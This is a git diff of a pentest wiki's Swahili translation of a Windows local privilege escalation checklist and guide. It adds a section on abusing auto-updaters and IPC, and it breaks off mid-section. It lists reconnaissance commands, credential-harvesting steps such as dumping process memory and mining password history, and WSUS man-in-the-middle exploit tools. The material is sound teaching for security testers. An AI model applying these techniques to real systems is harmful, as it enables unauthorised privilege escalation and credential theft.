diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 343cdd455..9a62d47c5 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -236,6 +236,7 @@ - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md) - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md) - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md) + - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md) - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md) - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md) - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md) diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md index 32fce6a81..a4d6db960 100644 --- a/src/windows-hardening/checklist-windows-privilege-escalation.md +++ b/src/windows-hardening/checklist-windows-privilege-escalation.md @@ -1,114 +1,115 @@ -# Orodha - Kuinua Haki za Windows za Mitaa +# Orodha ya ukaguzi - Local Windows Privilege Escalation {{#include ../banners/hacktricks-training.md}} -### **Zana bora ya kutafuta njia za kuinua haki za Windows za ndani:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +### **Zana bora ya kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) -### [Taarifa za Mfumo](windows-local-privilege-escalation/index.html#system-info) +### [System Info](windows-local-privilege-escalation/index.html#system-info) -- [ ] Pata [**Taarifa za mfumo**](windows-local-privilege-escalation/index.html#system-info) -- [ ] Tafuta **kernel** [**exploits kwa kutumia scripts**](windows-local-privilege-escalation/index.html#version-exploits) -- [ ] Tumia **Google kutafuta** **exploits** za kernel -- [ ] Tumia **searchsploit kutafuta** **exploits** za kernel -- [ ] Taarifa za kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)? -- [ ] Nywila katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)? +- [ ] Pata [**System information**](windows-local-privilege-escalation/index.html#system-info) +- [ ] Tafuta **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits) +- [ ] Tumia **Google to search** for kernel **exploits** +- [ ] Tumia **searchsploit to search** for kernel **exploits** +- [ ] Kuna taarifa ya kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)? +- [ ] Manenosiri katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)? - [ ] Taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)? - [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)? - [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)? +- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md) - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)? -### [Kuhesabu/AV enumeration](windows-local-privilege-escalation/index.html#enumeration) +### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration) -- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings)na [**WEF** ](windows-local-privilege-escalation/index.html#wef)settings +- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF** ](windows-local-privilege-escalation/index.html#wef) mipangilio - [ ] Angalia [**LAPS**](windows-local-privilege-escalation/index.html#laps) -- [ ] Angalia kama [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest)iko hai +- [ ] Angalia ikiwa [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) inafanya kazi - [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)? - [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials) - [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)? -- [ ] Angalia kama kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md) +- [ ] Angalia ikiwa kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md) - [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)? - [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md) - [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups) -- [ ] Angalia [**haki za**] **mtumiaji wa sasa** (windows-local-privilege-escalation/index.html#users-and-groups) -- [ ] Je, wewe ni [**mwanachama wa kikundi chochote chenye haki**](windows-local-privilege-escalation/index.html#privileged-groups)? -- [ ] Angalia kama una [mifumo hii ya tokens iliyoanzishwa](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ? -- [ ] [**Sessions za Watumiaji**](windows-local-privilege-escalation/index.html#logged-users-sessions)? -- [ ] Angalia [**nyumba za watumiaji**](windows-local-privilege-escalation/index.html#home-folders) (ufikiaji?) -- [ ] Angalia [**Sera ya Nywila**](windows-local-privilege-escalation/index.html#password-policy) -- [ ] Nini kiko [**ndani ya Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)? +- [ ] Angalia [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups) +- [ ] Je, wewe ni [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)? +- [ ] Angalia ikiwa una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ? +- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)? +- [ ] Angalia[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikia?) +- [ ] Angalia [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy) +- [ ] Nini kimepo[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)? -### [Mtandao](windows-local-privilege-escalation/index.html#network) +### [Network](windows-local-privilege-escalation/index.html#network) -- [ ] Angalia **taarifa za sasa za** [**mtandao**](windows-local-privilege-escalation/index.html#network) -- [ ] Angalia **huduma za ndani zilizofichwa** zilizozuiliwa kwa nje +- [ ] Angalia **current** [**network** **information**](windows-local-privilege-escalation/index.html#network) +- [ ] Angalia **hidden local services** zinazopatikana kutoka nje -### [Mchakato unaoendelea](windows-local-privilege-escalation/index.html#running-processes) +### [Running Processes](windows-local-privilege-escalation/index.html#running-processes) -- [ ] Mchakato wa binaries [**file na ruhusa za folda**](windows-local-privilege-escalation/index.html#file-and-folder-permissions) -- [ ] [**Kuchimba nywila za kumbukumbu**](windows-local-privilege-escalation/index.html#memory-password-mining) -- [ ] [**Programu za GUI zisizo salama**](windows-local-privilege-escalation/index.html#insecure-gui-apps) -- [ ] Pora nywila na **michakato ya kuvutia** kupitia `ProcDump.exe` ? (firefox, chrome, nk ...) +- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions) +- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining) +- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps) +- [ ] Pora credentials kwa **interesting processes** kwa kutumia `ProcDump.exe` ? (firefox, chrome, etc ...) -### [Huduma](windows-local-privilege-escalation/index.html#services) +### [Services](windows-local-privilege-escalation/index.html#services) -- [ ] [Je, unaweza **kubadilisha huduma yoyote**?](windows-local-privilege-escalation/index.html#permissions) -- [ ] [Je, unaweza **kubadilisha** **binary** inayotekelezwa na **huduma yoyote**?](windows-local-privilege-escalation/index.html#modify-service-binary-path) -- [ ] [Je, unaweza **kubadilisha** **registry** ya **huduma yoyote**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions) -- [ ] [Je, unaweza kunufaika na **path** ya **binary** ya **huduma isiyo na quote**?](windows-local-privilege-escalation/index.html#unquoted-service-paths) +- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions) +- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path) +- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions) +- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths) -### [**Programu**](windows-local-privilege-escalation/index.html#applications) +### [**Applications**](windows-local-privilege-escalation/index.html#applications) -- [ ] **Andika** [**ruhusa kwenye programu zilizowekwa**](windows-local-privilege-escalation/index.html#write-permissions) -- [ ] [**Programu za Kuanzisha**](windows-local-privilege-escalation/index.html#run-at-startup) -- [ ] **Wasiwasi** [**Madereva**](windows-local-privilege-escalation/index.html#drivers) +- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions) +- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup) +- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers) ### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking) -- [ ] Je, unaweza **kuandika katika folda yoyote ndani ya PATH**? -- [ ] Je, kuna binary ya huduma inayojulikana ambayo **inajaribu kupakia DLL isiyokuwepo**? -- [ ] Je, unaweza **kuandika** katika **folda za binaries**? +- [ ] Je, unaweza **write in any folder inside PATH**? +- [ ] Je, kuna binary ya huduma inayojulikana ambayo **tries to load any non-existant DLL**? +- [ ] Je, unaweza **write** in any **binaries folder**? -### [Mtandao](windows-local-privilege-escalation/index.html#network) +### [Network](windows-local-privilege-escalation/index.html#network) -- [ ] Hesabu mtandao (shares, interfaces, routes, neighbours, ...) -- [ ] Angalia kwa makini huduma za mtandao zinazokisikiliza kwenye localhost (127.0.0.1) +- [ ] Orodhesha mtandao (shares, interfaces, routes, neighbours, ...) +- [ ] Angalia kwa makini network services listening on localhost (127.0.0.1) -### [Nywila za Windows](windows-local-privilege-escalation/index.html#windows-credentials) +### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials) -- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)nywila -- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) nywila ambazo unaweza kutumia? -- [ ] Taarifa za kuvutia [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)? -- [ ] Nywila za mitandao ya [**Wifi zilizohifadhiwa**](windows-local-privilege-escalation/index.html#wifi)? -- [ ] Taarifa za kuvutia katika [**RDP Connections zilizohifadhiwa**](windows-local-privilege-escalation/index.html#saved-rdp-connections)? -- [ ] Nywila katika [**amri zilizokimbizwa hivi karibuni**](windows-local-privilege-escalation/index.html#recently-run-commands)? -- [ ] [**Meneja wa Nywila za Desktop ya KijRemote**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) nywila? -- [ ] [**AppCmd.exe** ipo](windows-local-privilege-escalation/index.html#appcmd-exe)? Nywila? +- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials +- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials ambazo unaweza kutumia? +- [ ] Taarifa za kuvutia katika [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)? +- [ ] Manenosiri za mitandao zilizohifadhiwa za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)? +- [ ] Taarifa za kuvutia katika [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)? +- [ ] Manenosiri katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)? +- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) manenosiri? +- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials? - [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading? -### [Faili na Registry (Nywila)](windows-local-privilege-escalation/index.html#files-and-registry-credentials) +### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials) -- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **na** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys) -- [ ] [**SSH keys katika registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)? -- [ ] Nywila katika [**faili zisizokuwa na mtu**](windows-local-privilege-escalation/index.html#unattended-files)? -- [ ] Backup yoyote ya [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups)? +- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys) +- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)? +- [ ] Manenosiri katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)? +- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup? - [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)? -- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) faili? +- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) file? - [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)? -- [ ] Nywila katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)? +- [ ] Nenosiri katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)? - [ ] Taarifa za kuvutia katika [**web** **logs**](windows-local-privilege-escalation/index.html#logs)? -- [ ] Je, unataka [**kuomba nywila**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji? -- [ ] Taarifa za kuvutia [**ndani ya Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)? -- [ ] Registry nyingine [**ikiwemo nywila**](windows-local-privilege-escalation/index.html#inside-the-registry)? -- [ ] Ndani ya [**data za kivinjari**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, historia, alama, ...)? -- [ ] [**Utafutaji wa nywila wa jumla**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry -- [ ] [**Zana**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za kutafuta nywila kiotomatiki +- [ ] Unataka [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji? +- [ ] Taarifa za kuvutia katika [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)? +- [ ] Mengine [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)? +- [ ] Ndani ya [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)? +- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry +- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) to automatically search for passwords ### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers) -- [ ] Je, una ufikiaji wa handler yoyote ya mchakato unaoendeshwa na msimamizi? +- [ ] Je, una ufikiaji wa handler yoyote ya mchakato unaoendeshwa na administrator? ### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation) -- [ ] Angalia kama unaweza kuitumia +- [ ] Angalia ikiwa unaweza kuitumia vibaya {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index 0c91c01ce..e1d225d44 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -8,7 +8,7 @@ ### Access Tokens -**Ikiwa haufahamu Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:** +**Ikiwa hujui Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} @@ -17,7 +17,7 @@ access-tokens.md ### ACLs - DACLs/SACLs/ACEs -**Angalia ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** +**Angalia ukurasa ufuatao kwa maelezo zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** {{#ref}} @@ -26,27 +26,27 @@ acls-dacls-sacls-aces.md ### Integrity Levels -**Ikiwa haufahamu integrity levels katika Windows, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** +**Ikiwa hujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} integrity-levels.md {{#endref}} -## Windows Security Controls +## Udhibiti wa Usalama wa Windows -Kuna mambo tofauti katika Windows yanayoweza **kukuzuia kuorodhesha mfumo**, kuendesha executables au hata **kutambua shughuli zako**. Unapaswa **kusoma** **ukurasa** ufuatao na **kuorodhesha** hizi zote za **mbinu** za **ulinzi** kabla ya kuanza upembuzi wa privilege escalation: +Kuna mambo tofauti ndani ya Windows ambayo yanaweza **prevent you from enumerating the system**, kuendesha executables au hata **detect your activities**. Unapaswa **soma** {{#raw}}**{{/raw}} ukurasa ufuatao na **kuorodhesha** zote hizi **mbinu** **za ulinzi** kabla ya kuanza privilege escalation enumeration: {{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}} -## System Info +## Taarifa za Mfumo ### Version info enumeration -Angalia kama toleo la Windows lina udhaifu wowote unaojulikana (angalia pia patches zilizowekwa). +Angalia ikiwa toleo la Windows lina udhaifu lolote linalojulikana (angalia pia patches zilizowekwa). ```bash systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information @@ -61,21 +61,21 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches ``` ### Version Exploits -Tovuti hii [site](https://msrc.microsoft.com/update-guide/vulnerability) inafaa kwa kutafuta taarifa za kina kuhusu Microsoft security vulnerabilities. Hifadhidata hii ina zaidi ya 4,700 security vulnerabilities, ikionyesha the **massive attack surface** ambayo mazingira ya Windows yanatoa. +Hii [site](https://msrc.microsoft.com/update-guide/vulnerability) ni ya msaada kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hifadhidata hii ina zaidi ya 4,700 udhaifu wa usalama, ikionyesha **massive attack surface** ambayo mazingira ya Windows yanayoonyesha. **Kwenye mfumo** - _post/windows/gather/enum_patches_ - _post/multi/recon/local_exploit_suggester_ - [_watson_](https://github.com/rasta-mouse/Watson) -- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas ina watson imejumuishwa)_ +- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_ -**Kialokalini na taarifa za mfumo** +**Kwenye mashinani na taarifa za mfumo** - [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - [https://github.com/bitsadmin/wesng](https://github.com/bitsadmin/wesng) -**Github repos za exploits:** +**Github repos of exploits:** - [https://github.com/nomi-sec/PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub) - [https://github.com/abatchy17/WindowsExploits](https://github.com/abatchy17/WindowsExploits) @@ -83,13 +83,13 @@ Tovuti hii [site](https://msrc.microsoft.com/update-guide/vulnerability) inafaa ### Mazingira -Kuna credential/Juicy info yoyote iliyohifadhiwa katika env variables? +Je, kuna credential/Juicy info zilizohifadhiwa katika env variables? ```bash set dir env: Get-ChildItem Env: | ft Key,Value -AutoSize ``` -### Historia ya PowerShell +### PowerShell Historia ```bash ConsoleHost_history #Find the PATH where is saved @@ -99,9 +99,9 @@ type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.tx cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` -### Faili za transkripti za PowerShell +### PowerShell Transcript files -Unaweza kujifunza jinsi ya kuamilisha hili kwenye [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) +Unaweza kujifunza jinsi ya kuwasha hili katika [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) ```bash #Check is enable in the registry reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription @@ -116,7 +116,7 @@ Stop-Transcript ``` ### PowerShell Module Logging -Maelezo ya utekelezaji wa PowerShell pipeline yanarekodiwa, ikiwa ni pamoja na amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya output huenda yasirekodiwe. +Maelezo ya utekelezaji wa pipeline za PowerShell yanarekodiwa, yakijumuisha amri zilizotekelezwa, miito ya amri, na sehemu za skripti. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya pato yanaweza kutochukuliwa. Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya nyaraka, ukichagua **"Module Logging"** badala ya **"Powershell Transcription"**. ```bash @@ -125,20 +125,20 @@ reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging ``` -Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell unaweza kutekeleza: +Ili kuona hafla 15 za mwisho kutoka kwenye PowersShell logs, unaweza kuendesha: ```bash Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView ``` ### PowerShell **Script Block Logging** -Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script inarekodiwa, ikihakikisha kwamba kila block ya msimbo imeandikishwa wakati inavyotekelezwa. Mchakato huu unahifadhi njia kamili ya ufuatiliaji ya kila shughuli, ambayo ni muhimu kwa forensiki na uchambuzi wa tabia zenye madhara. Kwa kurekodi shughuli zote wakati wa utekelezaji, hupatikana maarifa ya kina kuhusu mchakato. +Rekodi kamili ya shughuli na ya maudhui yote ya utekelezaji wa script inahifadhiwa, ikihakikisha kuwa kila sehemu ya msimbo imeandikwa wakati inavyoendeshwa. Mchakato huu unahifadhi njia kamili ya ukaguzi wa kila shughuli, yenye thamani kwa forensiki na uchambuzi wa tabia zenye madhara. Kwa kuandika shughuli zote wakati wa utekelezaji, inatoa ufahamu wa kina kuhusu mchakato. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging ``` -Matukio zilizoandikwa za Script Block zinaweza kupatikana ndani ya Windows Event Viewer katika njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ +Matukio ya Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ Ili kuona matukio 20 ya mwisho unaweza kutumia: ```bash Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview @@ -156,9 +156,9 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ``` ## WSUS -Unaweza kudhoofisha mfumo ikiwa sasisho hazitatafutwa kwa kutumia http**S** bali http. +Unaweza kupata udhibiti wa mfumo ikiwa sasisho hazitaombwa kwa http**S** bali kwa http. -Unaanza kwa kuangalia kama mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo katika cmd: +Anza kwa kukagua kama mtandao unatumia sasisho za WSUS zisizo za SSL kwa kuendesha yafuatayo katika cmd: ``` reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer ``` @@ -166,7 +166,7 @@ Au yafuatayo katika PowerShell: ``` Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer" ``` -Ikiwa unapata jibu kama mojawapo ya haya: +Ikiwa utapokea jibu kama moja ya hizi: ```bash HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535 @@ -182,11 +182,11 @@ PSProvider : Microsoft.PowerShell.Core\Registry ``` Na ikiwa `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` au `Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver"` ni sawa na `1`. -Then, **it is exploitable.** Ikiwa registry ya mwisho ni sawa na `0`, basi entry ya WSUS itatawazwa (it will be ignored). +Basi, **inaweza kutumiwa.** Ikiwa rekodi ya mwisho ya rejista ni sawa na 0, basi ingizo la WSUS litaachwa. -Ili ku-exploit vulnerabilities hizi unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic. +Ili kutekeleza udhaifu huu unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - Hizi ni skripti za exploit zilizotengenezwa kwa matumizi ya MiTM ili kuingiza masasisho 'bandia' kwenye trafiki ya WSUS isiyo ya SSL. -Read the research here: +Soma utafiti hapa: {{#file}} CTX_WSUSpect_White_Paper (1).pdf @@ -195,25 +195,33 @@ CTX_WSUSpect_White_Paper (1).pdf **WSUS CVE-2020-1013** [**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ -Kwa msingi, hii ndio flaw ambayo bug hii inatumia: +Kwa kifupi, hili ndilo kosa ambalo mdororo huu unalenga kutumia: -> If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run [PyWSUS](https://github.com/GoSecure/pywsus) locally to intercept our own traffic and run code as an elevated user on our asset. +> Ikiwa tuna uwezo wa kubadilisha proxy ya mtumiaji wetu wa ndani, na Windows Updates inatumia proxy iliyowekwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha [PyWSUS](https://github.com/GoSecure/pywsus) ndani ya mashine yetu ili kukamata trafiki yetu wenyewe na kuendesha msimbo kama mtumiaji mwenye viwango vilivyoongezwa. > -> Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service. +> Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, itatumia pia duka la vyeti la mtumiaji huo. Ikiwa tutatengeneza cheti kilichojiwekea kwa jina la mwenyeji wa WSUS na kuongeza cheti hicho kwenye duka la vyeti la mtumiaji wa sasa, tutaweza kukamata trafiki ya WSUS ya HTTP na HTTPS. WSUS haina mbinu kama HSTS za kutekeleza uthibitisho wa kuamini-mara-ya-mwanzo kwenye cheti. Ikiwa cheti kinachowasilishwa kinatambulika na mtumiaji na kina jina sahihi la mwenyeji, kitakubaliwa na huduma. -Unaweza ku-exploit vulnerability hii kwa kutumia zana [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (once it's liberated). +Unaweza kutekeleza udhaifu huu kwa kutumia zana [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (mara itakapotolewa). + +## Third-Party Auto-Updaters and Agent IPC (local privesc) + +Wakala wengi wa kampuni huweka uso wa localhost IPC na njia ya masasisho yenye ruhusa. Ikiwa usajili unaweza kulazimishwa kwa seva ya mshambuliaji na updater inamtumaini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa ndani anaweza kusambaza MSI mbaya ambayo huduma ya SYSTEM itaisakinisha. Angalia mbinu ya jumla (inayotegemea mnyororo wa Netskope stAgentSvc – CVE-2025-0309) hapa: + +{{#ref}} +abusing-auto-updaters-and-ipc.md +{{#endref}} ## KrbRelayUp -Kuna vulnerability ya **local privilege escalation** katika mazingira ya Windows **domain** chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo **LDAP signing is not enforced,** watumiaji wana self-rights zinazoruhusu wao kusanidi **Resource-Based Constrained Delegation (RBCD),** na uwezo wa watumiaji kuunda computers ndani ya domain. Ni muhimu kutambua kuwa mahitaji haya (requirements) yanatimizwa kwa **default settings**. +Kuna udhaifu wa **local privilege 